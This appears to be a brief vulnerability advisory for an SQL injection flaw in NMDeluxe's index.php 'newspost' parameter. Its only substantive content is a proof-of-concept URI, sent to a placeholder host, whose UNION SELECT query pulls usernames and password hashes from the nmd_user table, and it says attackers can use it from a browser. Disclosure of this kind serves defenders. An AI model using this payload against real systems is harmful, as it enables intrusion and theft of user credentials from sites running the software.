NMDeluxe Index.PHP Newspost SQL Injection Vulnerability

NMDeluxe Index.PHP Newspost SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/[nmdeluxe]/index.php?do=newspost&id=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3a,password)%20FROM%20nmd_user/*